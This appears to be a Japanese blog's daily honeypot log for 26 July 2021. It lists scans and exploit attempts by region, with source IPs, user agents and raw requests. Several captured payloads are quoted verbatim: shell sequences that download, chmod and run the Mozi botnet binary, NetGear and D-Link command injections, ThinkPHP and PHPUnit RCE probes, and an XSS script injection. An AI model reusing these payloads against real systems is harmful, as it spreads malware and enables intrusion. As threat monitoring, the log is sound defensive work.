コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/07/26 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/07/26分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

Apache Tomcatへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location:US

NetGear製品の脆弱性を狙うアクセス
.cssへのスキャン行為
.jsへのスキャン行為
phpMyAdminへのスキャン行為
91[.]218[.]66[.]96に関する不正通信
を確認しました。

Location:UK

phpMyAdminへのスキャン行為
91[.]218[.]66[.]96に関する不正通信
を確認しました。

Location:SG

NetGear製品の脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:62 (前日比:-113)
US:総アクセス数:310 (前日比:+261)
UK:総アクセス数:267 (前日比:+105)
SG:総アクセス数:228 (前日比:+37)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
2 3.237.6.204 United States
1 13.58.161.0 United States
9 31.210.20.127 Netherlands
1 35.154.190.168 United States
1 37.0.11.112 Netherlands
1 45.61.185.171 United States
22 45.146.164.110 Russia
1 45.148.8.154 Romania
1 45.229.55.10 Brazil
1 80.82.76.6 United Kingdom
2 85.132.3.30 Azerbaijan
1 93.174.89.216 United Kingdom
6 135.125.246.189 France
1 138.68.156.234 United States
1 144.91.115.240 Germany
1 149.129.50.37 Singapore
1 180.149.125.175 Mongolia
1 193.174.89.19 Germany
1 193.200.50.189 Poland
3 197.232.1.182 Kenya
2 205.185.115.135 United States
1 209.141.41.98 United States
1 209.141.50.63 United States

UserAgent一覧

件数 UserAgent
6 -
1 Googlebot/2.1 (+http://www.google.com/bot.html)
1 Hello, World
1 Mozilla/4.72C-CCK-MCD Caldera Systems OpenLinux [en] (X11; U; Linux 2.2.14 i686)
9 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
12 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
1 python-requests/2.9.1

リクエスト内容一覧

件数 Method Request Protocol
4 \x16\x03\x01
1 \x16\x03\x01\x01\xfa\x01
13 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api.php?key=1 HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /assets/.env HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /script HTTP/1.1\n
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /vendor/.env HTTP/1.1
3 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webadmin/Index.action HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//www[.]proxylists[.]net/proxyjudge.php HTTP/1.1
1 HEAD / HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.205.213.132 United States
1 23.95.85.101 United States
11 45.146.164.110 Russia
1 61.242.58.223 China
3 91.218.66.243 Germany
122 91.224.133.230 Russia
1 115.52.226.166 China
159 118.26.36.169 Hong Kong
3 135.125.217.54 France
1 172.105.89.161 United States
1 180.149.125.175 Mongolia
1 193.174.89.19 Germany
2 205.185.115.135 United States
2 209.141.41.98 United States
1 209.141.50.63 United States

UserAgent一覧

件数 UserAgent
59 -
12 Mozilla/5.0 (Linux; Android 8.1; EML-L29 Build/HUAWEIEML-L29; xx-xx) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 (iPad; iPhone; CPU iPhone OS 13_2_3 like Mac OS X)
94 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
122 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0

リクエスト内容一覧

件数 Method Request Protocol
53 -
3 CONNECT 91[.]218[.]66[.]96:4444 HTTP/1.1
5 GET /.env HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Content/css/wzwstylel.css HTTP/1.1
1 GET /Css/Hm.css HTTP/1.1
1 GET /Home/Bind/binding HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
2 GET /PMA2012/index.php?lang=en HTTP/1.1
4 GET /PMA2015/index.php?lang=en HTTP/1.1
2 GET /PMA2016/index.php?lang=en HTTP/1.1
1 GET /PMA2017/index.php?lang=en HTTP/1.1
1 GET /PMA2018/index.php?lang=en HTTP/1.1
3 GET /PMA2019/index.php?lang=en HTTP/1.1
1 GET /PMA2020/index.php?lang=en HTTP/1.1
3 GET /PMA2021/index.php?lang=en HTTP/1.1
1 GET /Pc/Lang/index.html HTTP/1.1
1 GET /Public/Home/images/game/pk10.png HTTP/1.1
1 GET /Public/Home/js/cls.js HTTP/1.1
1 GET /Public/Home/js/common.js HTTP/1.1
1 GET /Public/Wchat/js/cvphp.js HTTP/1.1
1 GET /Public/css/hall.css HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /Public/home/js/fukuang.js HTTP/1.1
1 GET /Public/initJs.php HTTP/1.1
1 GET /Public/mobile/js/config.js HTTP/1.1
1 GET /Res/font/font.css HTTP/1.1
1 GET /Templates/user/finance/css/userPay.css HTTP/1.1
1 GET /Templates/user/js/global.js HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
5 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin_user/m_tixian.php HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
2 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /ajax/allcoin_a/id/0?t=0.3782499195965951 HTTP/1.1
1 GET /api/ApiHub/fetchJinse HTTP/1.1
1 GET /api/content_bottom HTTP/1.1
1 GET /api/currency/quotation_new HTTP/1.1
1 GET /api/exclude/siteConfig/webSiteConfig HTTP/1.1
1 GET /api/message/webInfo HTTP/1.1
1 GET /api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1 HTTP/1.1
1 GET /api/uploads/apimap HTTP/1.1
1 GET /api/user/info?&&callback=jsonp_1601457046411_20983 HTTP/1.1
1 GET /api/v/index/queryOfficePage?officeCode=customHomeLink HTTP/1.1
1 GET /api/v1/member/kefu HTTP/1.1
1 GET /api/web/user/getIndexData.php HTTP/1.1
1 GET /app/common/getRegisterSet HTTP/1.1
1 GET /appxz/index.html HTTP/1.1
1 GET /assets/js/dmshub.js HTTP/1.1
1 GET /base/exchange_index/googlecode HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /c/ HTTP/1.1
1 GET /client/api/findConfigByKey?configKey=level_config HTTP/1.1
1 GET /common/template/lottery/lecai/css/style.css HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /csjs/bankCheck.js HTTP/1.1
1 GET /css/app.css HTTP/1.1
1 GET /css/info.css HTTP/1.1
1 GET /css/main.css HTTP/1.1
1 GET /css/skin/ymPrompt.css HTTP/1.1
1 GET /data/json/config.json HTTP/1.1
2 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
3 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
3 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
4 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fePublicInfo/ HTTP/1.1
1 GET /friendGroup/list HTTP/1.1
1 GET /getConfig/getArticle.do?code=1 HTTP/1.1
1 GET /getConfig/getArticle.do?code=19 HTTP/1.1
1 GET /getConfig/listPopFrame.do?code=1&position=index&_=1601489645097 HTTP/1.1
1 GET /getLocale HTTP/1.1
1 GET /home/GetQrCodeInfo HTTP/1.1
1 GET /home/loadmymanager HTTP/1.1
1 GET /index.php?m=api&c=app&a=getPlatformConfig HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index/Mobile/fenshi?code=sz002405 HTTP/1.1
1 GET /index/Mobile/kline_week?code=sz003043 HTTP/1.1
1 GET /index/index/andiro HTTP/1.1
1 GET /infe/rest/fig/advertise/common.json?mobile_open=1 HTTP/1.1
1 GET /ipl/app/flash/publicbmw/ball/FigLeaf.js?site=member HTTP/1.1
1 GET /js/base1.js HTTP/1.1
1 GET /js/dianzan.js HTTP/1.1
1 GET /js/json.js HTTP/1.1
1 GET /js/tvConfig.js HTTP/1.1
1 GET /kefu.php HTTP/1.1
1 GET /kkrps/im_group/show_members HTTP/1.1
1 GET /langConfig.js HTTP/1.1
1 GET /leftDao.php?callback=jQuery183016740860980352856_1604309800583 HTTP/1.1
1 GET /legal/currency/set HTTP/1.1
1 GET /login/img/nyyh/game.css HTTP/1.1
1 GET /m/allticker/1 HTTP/1.1
1 GET /market/getStockBaseInfo?stockCodeInternal=2658 HTTP/1.1
1 GET /market/market-ws/iframe.html HTTP/1.1
1 GET /mobile/config.js HTTP/1.1
1 GET /mobile/script/main.m.js HTTP/1.1
3 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
3 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /pages/console/js/common.js HTTP/1.1
2 GET /php-my-admin/index.php?lang=en HTTP/1.1
3 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
4 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
4 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /pma2012/index.php?lang=en HTTP/1.1
2 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
2 GET /pma2021/index.php?lang=en HTTP/1.1
1 GET /portal/index/protocol.html HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /public/css/style.css HTTP/1.1
1 GET /public/web/js/add/com.js HTTP/1.1
1 GET /resources/css/headernav.css HTTP/1.1
1 GET /resources/main/common.js HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /site.js HTTP/1.1
1 GET /skin/js/common.js HTTP/1.1
1 GET /skin/main/onload.js HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /sql/myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
2 GET /sql/sql/index.php?lang=en HTTP/1.1
2 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
2 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /static/common/js/common.js HTTP/1.1
1 GET /static/css/mobile.css HTTP/1.1
1 GET /static/diff_worker.js HTTP/1.1
1 GET /static/download/style.css HTTP/1.1
1 GET /static/guide/ab.css HTTP/1.1
1 GET /static/home/css2/login--1.css HTTP/1.1
1 GET /static/home/static/js/login.js HTTP/1.1
1 GET /static/index/css/iindex.css HTTP/1.1
1 GET /static/wap/js/common.js HTTP/1.1
1 GET /static/xianyu/js/bankCheck.js HTTP/1.1
1 GET /stock/search.html?keyword=00202 HTTP/1.1
1 GET /template/920ka/js/woodyapp.js HTTP/1.1
1 GET /template/js/comm/Confrim.js HTTP/1.1
1 GET /template/tmp1/js/common.js HTTP/1.1
1 GET /user/Login HTTP/1.1
1 GET /user/userlist HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /views/commData/commonSite.js HTTP/1.1
1 GET /wap/trading/get_newallorder_ajax HTTP/1.1
1 GET /web/api/getBanner HTTP/1.1
1 GET /webadmin/Index.action HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /ws/index/getTheLotteryInitList HTTP/1.1
1 GET /xy/ HTTP/1.1
1 GET /zz2/address.php?gid=651 HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
1 POST /login/kefuxian.mvc HTTP/1.1
1 POST /m.api HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
123 35.192.38.146 United States
22 45.146.164.110 Russia
4 91.218.66.243 Germany
1 93.174.89.216 United Kingdom
1 103.242.119.65 India
2 103.246.113.13 Malaysia
1 113.180.172.6 Vietnam
101 123.149.81.42 China
1 148.64.121.254 United States
1 172.105.89.161 United States
1 178.60.27.186 Spain
1 180.149.125.175 Mongolia
1 193.174.89.19 Germany
1 205.185.115.135 United States
3 209.141.41.98 United States
3 209.141.50.63 United States

UserAgent一覧

件数 UserAgent
7 -
2 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
122 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
8 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
1 \">

リクエスト内容一覧

件数 Method Request Protocol
1 -
4 CONNECT 91[.]218[.]66[.]96:4444 HTTP/1.1
1 GET /%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fzd4life[.]xss[.]ht%3Ehttp://132[.]145[.]66[.]34%3C%2Fscript%3E HTTP/1.1
2 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA2011/index.php?lang=en HTTP/1.1
1 GET /PMA2012/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
1 GET /PMA2018/index.php?lang=en HTTP/1.1
1 GET /PMA2021/index.php?lang=en HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
3 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
3 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /c/ HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
4 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
4 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
3 GET /db/webadmin/index.php?lang=en HTTP/1.1
3 GET /db/websql/index.php?lang=en HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
4 GET /mysql/pma/index.php?lang=en HTTP/1.1
2 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
6 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
2 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4.8.5/index.php HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
5 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2014/index.php?lang=en HTTP/1.1
3 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
4 GET /pma2021/index.php?lang=en HTTP/1.1
2 GET /program/index.php?lang=en HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /sql/myadmin/index.php?lang=en HTTP/1.1
3 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
2 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
3 GET /sql/webdb/index.php?lang=en HTTP/1.1
2 GET /sql/websql/index.php?lang=en HTTP/1.1
2 GET /sqlmanager/index.php?lang=en HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webadmin/Index.action HTTP/1.1
3 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
8 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 42.235.95.124 China
1 45.63.69.171 United States
22 45.146.164.110 Russia
2 47.114.73.0 China
1 51.255.3.2 France
1 58.248.193.228 China
4 71.6.199.23 United States
48 75.165.139.34 United States
1 81.250.134.101 France
4 91.218.66.243 Germany
2 93.174.89.216 United Kingdom
1 103.242.119.65 India
2 103.246.113.13 Malaysia
1 119.179.239.163 China
1 125.47.209.190 China
3 135.125.217.54 France
1 144.91.115.240 Germany
3 163.172.159.134 United Kingdom
1 167.99.69.55 United States
1 172.245.158.3 United States
1 180.149.125.175 Mongolia
4 185.181.102.18 Romania
4 193.56.29.145 United Kingdom
4 193.56.29.183 United Kingdom
2 205.185.115.135 United States
1 209.141.50.63 United States
101 217.86.70.125 Germany
10 222.77.181.28 China

UserAgent一覧

件数 UserAgent
15 -
1 Go-http-client/1.1
1 Hello, world
2 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/56.0.3051.116
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
48 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
14 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 \">

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01\xfb\x01
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
4 CONNECT 91[.]218[.]66[.]96:4444 HTTP/1.1
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
1 GET /%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fzd4life[.]xss[.]ht%3Ehttp://13[.]67[.]44[.]234%3C%2Fscript%3E HTTP/1.1
9 GET /.env HTTP/1.1
2 GET /.well-known/security.txt HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /PMA/ HTTP/1.1
1 GET /SQLite/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.4/main.php HTTP/1.1
1 GET /SQLiteManager/main.php HTTP/1.1
1 GET /SQlite/main.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /admin/ HTTP/1.1
1 GET /agSearch/SQlite/main.php HTTP/1.1
2 GET /app/.env HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /c/ HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /core/.env HTTP/1.1
1 GET /dbadmin/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
